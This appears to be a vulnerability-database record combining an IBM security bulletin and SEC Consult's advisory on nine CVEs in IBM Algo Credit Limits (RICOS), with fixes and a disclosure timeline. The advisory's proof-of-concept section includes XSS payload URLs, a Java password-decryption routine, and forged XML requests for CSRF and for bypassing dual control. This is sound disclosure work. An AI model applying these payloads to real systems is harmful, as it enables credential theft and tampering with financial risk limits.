RICOS in IBM Algo Credit Limits (aka ACLM) 4.5.0 through 4.7.0 before 4.7.0.03 FP5 in IBM Algorithmics sends cleartext credentials over HTTP, which allows remote attackers to obtain sensitive information by sniffing the network.
{"ibm": [{"lastseen": "2022-06-28T22:05:24", "description": "## Summary\n\nAbstract: Multiple security vulnerabilities exist in certain GUI components of IBM Algo Credit Limits, namely ACLM Web GUI, PDS Blotter Web GUI, and ACLM Win GUI. Details of each vulnerability and the affected component(s) are set out below.\n\n## Vulnerability Details\n\n**DESCRIPTION:** \nCustomers who have IBM Algo Credit Limits are potentially impacted by these vulnerabilities. \n \n\n\n**CVE ID**| **DESCRIPTION** \n---|--- \n[_CVE-2014-0864_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0864>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90938_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90938>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI \nThe ACLM Web GUI does not verify that requests are made only from within the web application. An attacker could trick users into making an unintentional request to the web application which will be treated as an authorized request. This may allow an attacker to perform tasks on behalf of the victim user, like modifying limits. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0865_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0865>) \nCVSS: \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90939_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90939>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)| Affected Components: ACLM Win GUI \nThe ACLM Win GUI client performs input validation only client-side. This could allow an attacker to alter arbitrary data, e.g. create a limit. This vulnerability could also be used to circumvent dual control mechanisms by manipulating data after creation. \nThe attack requires network access, some degree of authentication and degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0866_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0866>) \nCVSS: \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90940_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90940>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)| Affected Component(s): ACLM Win GUI, PDS Blotter Web GUI \nThe ACLM Win GUI client submits user credentials in plain-text. An attacker with access to the network communication could perform man-in-the-middle attacks and obtain user credentials. This vulnerability also applies to the PDS Blotter Web GUI client, where authentication is performed unencrypted. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack may partially compromise the confidentiality of information. It will not compromise the availability of the system or the integrity of data. \n[_CVE-2014-0867_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0867>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90941_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90941>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI \nA vulnerable page in ACLM Web GUI could allow an attacker to set and overwrite arbitrary cookies for a user that clicks on a manipulated link. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0868_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0868>) \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90942_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90942>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI \nThe ACLM Web GUI application performs input validation only client-side. This could allow an attacker to alter arbitrary data. This vulnerability could also be used to circumvent dual control mechanisms by manipulating data after creation. \nThe attack requires network access, some degree of authentication and degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0869_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0869>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90943_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90943>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)| Affected Component(s): ACLM Web GUI, PDS Blotter Web GUI, ACLM Win GUI \nInsufficient encryption for storing and transferring users\u2019 passwords could allow an attacker to retrieve the plain-text passwords without further knowledge of cryptographic keys. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack may partially compromise the confidentiality of information but will not compromise the availability of the system or the integrity of data. \n[_CVE-2014-0870_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0870>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90944_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90944>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)| Affected Component(s): ACLM Web GUI, PDS Blotter Web GUI \nThe ACLM Web GUI and the PDS Blotter Web GUI do not correctly neutralize user-controllable input before it is placed in output that is served as a web page. This may be used in a Cross-site scripting attack. Attackers could compromise user sessions and impersonate other users while performing arbitrary actions on behalf of the victim user. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack will not compromise the confidentiality of information or the availability of the system but may compromise the integrity of data. \n[_CVE-2014-0871_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0871>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90945_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90945>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)| Affected Component(s): ACLM Web GUI \nTomcat configuration discloses technical details within error messages to the user. This could allow an attacker to collect valuable data about the environment of the solution. \nThe attack requires network access, no authentication and some degree of specialized knowledge and techniques. An attack may partially compromise the confidentiality of information but will not compromise the availability of the system or the integrity of data. \n[_CVE-2014-0894_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0894>) \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/91313_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/91313>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:P/I:N/A:N)| Affected Component(s): ACLM Web GUI \nThe password and the username of the backend database are disclosed in clear-text to the user of the ACLM Web GUI client. This could allow attackers to directly connect to the backend database and manipulate arbitrary data stored in the database. \nThe attack requires network access, some degree of authentication and specialized knowledge and techniques. An attack may partially compromise the confidentiality of information but will not compromise the availability of the system or the integrity of data. \n \n## Affected Products and Versions\n\nIBM Algo Credit Limits versions 4.5.0 - 4.7.0\n\n## Remediation/Fixes\n\nA fix has been created for version 4.7.0.03 of the named product. Download and install the fix as soon as practicable. Fix and installation instructions are provided at the URL listed below. \n \nFor versions prior to 4.7.0 IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n \n \n\n\nPatch Number| Download URL \n---|--- \nACLM 4.7.0.03 FP5| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHES-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHES-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIX-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIX-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-WinDB2-fp0005:0&includeSupersedes=0&source=fc&login=true>) \n \n## Workarounds and Mitigations\n\nNone known, apply fixes.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nA. Kolmann, V. Habsburg-Lothringen, F. Lukavsky of SEC Consult Vulnerability Lab\n\n## Change History\n\n23 June 2014: Original Copy Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SS9T6M\",\"label\":\"Algo Credit Limits\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.7.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}] \n\n## Product Synonym\n\nACL;ACLM;RICOS;Algo Credit Limit Manager", "cvss3": {}, "published": "2018-06-15T22:31:27", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Certain GUI Components of IBM Algo Credit Limits.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0864", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0867", "CVE-2014-0868", "CVE-2014-0869", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0894"], "modified": "2018-06-15T22:31:27", "id": "EAD07763DB215245A2D68732E923A4EEDD76DA386AE47C4E3383928DCFB4324C", "href": "https://www.ibm.com/support/pages/node/513307", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\r\n=======================================================================\r\n title: Multiple severe vulnerabilities\r\n product: IBM Algorithmics RICOS\r\n vulnerable version: 4.5.0 - 4.7.0\r\n fixed version: 4.7.0.03\r\n CVE number: CVE-2014-0894\r\n CVE-2014-0871\r\n CVE-2014-0870\r\n CVE-2014-0869\r\n CVE-2014-0868\r\n CVE-2014-0867\r\n CVE-2014-0866\r\n CVE-2014-0865\r\n CVE-2014-0864\r\n impact: critical\r\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\r\n found: 2013-12-19\r\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\nVendor description:\r\n- -------------------\r\nIBM Algorithmics software enables financial institutions and corporate\r\ntreasuries to make risk-aware business decisions. Supported by a global\r\nteam of risk experts based in all major financial centers, IBM\r\nAlgorithmics solution offerings include market, credit and liquidity risk,\r\nas well as collateral and capital management.\r\n\r\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\r\n\r\nRICOS is a pre-deal limit management solution part of the Algo Suite.\r\n\r\n\r\nBusiness recommendation:\r\n- ------------------------\r\nThe identified vulnerabilities affect integrity and confidentiality of the\r\nrisk management system. SEC Consult does not recommend to rely on RICOS as\r\npart of risk management until a thorough security review has been performed\r\nby security professionals. As a workaround, access should be limited only to\r\ntrusted users internally and sample checks regarding the plausibility of limits\r\nshould be performed manually.\r\n\r\n\r\nVulnerability overview/description:\r\n- -----------------------------------\r\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\r\nThe Tomcat configuration discloses technical details within error messages to\r\nthe user, which allows an attacker to collect valuable data about the\r\nenvironment of the solution.\r\n\r\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\r\nThe password and the username of the backend database are disclosed in\r\nclear-text to the user of the web application. This allows attackers to\r\ndirectly connect to the backend database and manipulate arbitrary data stored\r\nin the database (e.g. limits).\r\n\r\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\r\nSeveral parameters in the RICOS web front end and the Blotter are not properly\r\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\r\nuser sessions and impersonate other users while performing arbitrary actions\r\non behalf of the victim user.\r\n\r\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\r\nWeak cryptographic algorithms, being used to store and transfer\r\nuser's passwords, allow an attacker to retrieve the plain-text passwords\r\nwithout further knowledge of cryptographic keys.\r\n\r\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\r\nCVSS 3.5)\r\nSeveral fields of stored data within RICOS are marked as read-only in the web\r\napplication, disallowing modification of certain fields. These checks are only\r\nperformed client-side, allowing an attacker to alter arbitrary data. An\r\nattacker can create a limit, alter the username of the created limit and\r\nconfirm the limit himself, circumventing dual control mechanisms advertised by\r\nRICOS.\r\n\r\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\r\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\r\ncookies for a user that clicks on a manipulated link.\r\n\r\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\r\nThe RICOS fat client submits user credentials in plain-text. An attacker with\r\naccess to the network communication can perform man-in-the-middle attacks and\r\nsteal user credentials.\r\nThis vulnerability also applies to the Blotter, where authentication is\r\nperformed unencrypted.\r\n\r\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\r\nThe RICOS fat client performs input validation only client-side. This allows\r\nan attacker to alter arbitrary data. An attacker can create a limit, alter\r\nthe username of the created limit and confirm the limit himself, circumventing\r\ndual control mechanisms advertised by RICOS.\r\n\r\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\r\nThe web application does not verify that requests are made only from within\r\nthe web application, allowing an attacker to trick users into performing\r\nrequests to the web application. This allows an attacker to perform tasks on\r\nbehalf of the victim user like modifying limits.\r\n\r\n\r\nProof of concept:\r\n- -----------------\r\n1) Information Disclosure\r\nThe following URL causes a status 404, disclosing the Tomcat version:\r\nhttps://ricos/ricos470/classes/\r\n\r\nIf control characters (i.e. \x00) are sent as part of the cookie, a stack trace\r\nis triggered\r\n\r\n2) Password Disclosure\r\nThe following request sent by the client during regular communication shows the\r\ndatabase connection settings including the username and the password in\r\nclear-text.\r\n\r\nPOST /ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n\r\n...SNIP...\r\n<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i\r\nn="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t\r\nn="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"\r\nv="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i\r\nn="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i\r\nn="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"\r\nv="password"/>\r\n...SNIP...\r\n\r\n3) Non-permanent Cross-Site Scripting\r\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\r\n\r\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\r\nHost: ricos\r\n\r\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\r\n\r\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x\r\n\r\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//\r\n\r\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\r\n\r\n\r\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>\r\n\r\n4) Broken Encryption\r\nThe user's password is transported frequently in requests within the application.\r\nThe following function decrypts the password without requiring any cryptographic key:\r\n\r\npublic static void decrypt(String string)\r\n{\r\n\tint nRadix = 32;\r\n\tint nR2 = nRadix * nRadix / 2;\r\n\tGregorianCalendar cal = new GregorianCalendar();\r\n\tString key = string.substring(0, 2);\r\n\tint nKey = Integer.parseInt(key, 32);\r\n\t\r\n\tString encPw = string.substring(2, string.length());\r\n\tint y = 0;\r\n\tfor (int i = 0; i < encPw.length(); i+=2)\r\n\t{\r\n\t\tString aktuell = encPw.substring(i,i+2);\t\r\n\t\tint new_value = Integer.parseInt(aktuell, 32);\r\n\t\tint character = - nKey * (y + 1) % nR2 + new_value;\r\n\t\tchar decrypt = (char) character;\r\n\t\tSystem.out.print(decrypt);\r\n\t\ty = y + 1;\r\n\t}\t\t\r\n}\r\n\r\n5) Manipulation of read-only data / dual control mechanism bypass\r\nThe following example illustrates how to manipulate a request so that the server\r\nsaves it on behalf of another user (only the relevant parts are shown):\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.getmeta_udf"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#OutputData">\r\n <t n="#MapTable">\r\n <i n="#ResultData" v="#ResultData"/>\r\n <i n="#ResultTable" v="#ResultTable"/>\r\n </t>\r\n </t>\r\n <t n="#InputData">\r\n <t n="#WorkTable">\r\n <t n="det_limit">\r\n <i n="SCTYGEID" v="A"/>\r\n[...]\r\n <i n="LMLCURID" v="other_user"/>\r\n <i n="LMEQEPSTDA" v=""/>\r\n[...]\r\n <i n="MFURID" v="other_user"/>\r\n <i n="LMEVFL" v="N"/>\r\n <i n="SOLMFL" v="N"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n <i n="MFURID" v="other_user"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n[...]\r\n </t>\r\n <t n="Session">\r\n <t n="SessionData">\r\n <i n="LoginUser" v="other_user"/>\r\n <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>\r\n[...]\r\n <i n="LoginUser v="other_user"/>\r\n <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>\r\n <i n="URN" v=""/>\r\n <i n="SecServiceURN" v="obsv2:ricos:20100"/>\r\n[...]\r\n </t>\r\n <t n="ObServer">\r\n <i n="UserId" v="other_user"/>\r\n <i n="Password" v=""/>\r\n <i n="Host" v="ricos"/>\r\n[...]\r\n <i n="Prefix" v="RICA"/>\r\n <i n="DbSystem" v="oracle"/>\r\n <i n="LoginUserId" v="other_user"/>\r\n </t>\r\n </t>\r\n </t>\r\n</ds>\r\n\r\n6) Cross-Site Cookie Setting\r\nThe following URL allows setting of arbitrary cookies:\r\n\r\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\r\n\r\n7) Plain-text submission of passwords\r\nNeither the fat client nor the Blotter use https to communicate with the\r\nbackend server. Both send unencrypted credentials via http during authentication.\r\n\r\n8) Client-side Input Validation\r\nBy manipulating serialized objects that are transmitted by the fat client,\r\nit is possible to change the user name who created a limit, allowing an attacker\r\nto bypass dual control mechanisms.\r\n\r\n9) Cross-Site Request Forgery\r\nThe following request, sent on behalf of an authenticated user will e.g.\r\nchange the currency of a given deal:\r\n\r\nPOST http://ricos/ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.updrec_msp"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#InputData">\r\n <t n="#MapTable">\r\n <i n="#InputData" v="det_msp"/>\r\n </t>\r\n <t n="#WorkTable">\r\n <t n="det_msp">\r\n <i n="SYPMID" v="SYS-PAR-ID"/>\r\n <i n="CUCD" v="USD"/>\r\n <i n="MIGORILV" v="11"/>\r\n <i n="ILPLMVFL" v="Y"/>\r\n <i n="ILNEMVFL" v="Y"/>\r\n <i n="BSCUONFL" v="N"/>\r\n <i n="PBSCUOFL" v="N"/>\r\n <i n="LORICUTEFL" v="N"/>\r\n <i n="SYSAVAILFL" v="F"/>\t\r\n <i n="CUSTID" v="CUSTOMER"/>\r\n <i n="CBNALI" v="IS-LOCATED-IN"/>\r\n <i n="CBNAAG" v="AUTOMATIC-GROUP"/>\r\n <i n="UDF1" v="Welcome to ricos 4.71"/>\r\n </t>\r\n...SNIP...\r\n\r\n\r\nVulnerable / tested versions:\r\n- -----------------------------\r\nIBM Algorithmics RICOS 4.71\r\n\r\n\r\nVendor contact timeline:\r\n- ------------------------\r\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\r\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\r\n asking for acknowledgements\r\n2014-01-24: Sending acknowledgements\r\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\r\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\r\n2014-02-10: Providing further information on assumed to be false positive issue 1441\r\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\r\n patches are scheduled for end of June 2014\r\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\r\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\r\n2014-06-26: Vendor published patches and security bulletin\r\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n2014-06-30: SEC Consult publishes the advisory\r\n\r\n\r\nSolution:\r\n- ---------\r\nApply patch ACLM 4.7.0.03 FP5. More information:\r\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n\r\n\r\nWorkaround:\r\n- -----------\r\nLimit access to RICOS and manually perform sample checks regarding the\r\nplausibility of limits.\r\n\r\n\r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n\r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n\r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n\r\nInterested to work with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n\r\nEOF F. Lukavsky / @2014\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+\r\nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg\r\nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F\r\nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e\r\n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl\r\nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=\r\n=OFL7\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 